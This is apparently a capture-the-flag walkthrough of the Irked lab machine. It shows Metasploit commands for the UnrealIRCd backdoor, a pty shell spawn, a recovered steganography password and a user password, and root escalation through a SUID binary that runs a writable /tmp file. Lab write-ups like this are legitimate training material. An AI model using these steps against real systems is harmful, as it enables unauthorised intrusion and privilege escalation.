nmap result

The web server has nothing interesting in there. I tried the dibuster but did not find anything interesting. There is the only emoji in the index file.

There is IRC running which looks interesting for us, let's try to dig into that.

Using Searchsploit we found that UnrealIRCd is vulnerable. Googling about this exploit I found a Metasploit Module.

searchsploit result

Exploiting the Server

msf >use exploit/unix/irc/unreal_ircd_3281_backdoor

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set RPORT 6697

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOST 10.10.10.117

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

exploit using MSF

This gives the shell and using python we got the interactive shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'

Low privilege shell

Using the IRC exploit we got the Low Privilege shell, searching for the user.txt file, I found that user.txt is in the other user Documents folder but we don’t have the permission to open the file.

User.txt file location

.backup file gives us some interesting info.

Super elite steg backup pw UPupDOWNdownLRlrBAbaSSss

So the password is related to some steganography. Steghide is the most common stego tool which uses the password.

Try this UPupDOWNdownLRlrBAbaSSss on the irked.jpg image gives us the password. Which is on the index page.

To install steghide:-

apt-get install steghide

steghide

Password: Kab6h+m+bbp2J:HG

OWN USER

$ su djmardov Password: Kab6h+m+bbp2J:HG $ cat djmardov/Documents/user.txt

User.txt

PRIVILEGED ESCALATION

$ find / -perm -u=s -type f 2>/dev/null



/tmp/listusers/usr/lib/dbus-1.0/dbus-daemon-launch-helper

/usr/lib/eject/dmcrypt-get-device

/usr/lib/policykit-1/polkit-agent-helper-1

/usr/lib/openssh/ssh-keysign

/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper

/usr/sbin/exim4

/usr/sbin/pppd

/usr/bin/chsh

/usr/bin/procmail

/usr/bin/gpasswd

/usr/bin/newgrp

/usr/bin/at

/usr/bin/pkexec

/usr/bin/X

/usr/bin/passwd

/usr/bin/chfn

/usr/bin/viewuser

/sbin/mount.nfs

/bin/su

/bin/mount

/bin/fusermount

/bin/ntfs-3g

/bin/umount

We find a non-standard Linux binary /usr/bin/viewuser.

/usr/bin/viewuser

This application is executing /tmp/listusers. so let's insert a shell in listusers and ran this one more time.

listusets with shell

gain root

switch to the interactive shell

OWN ROOT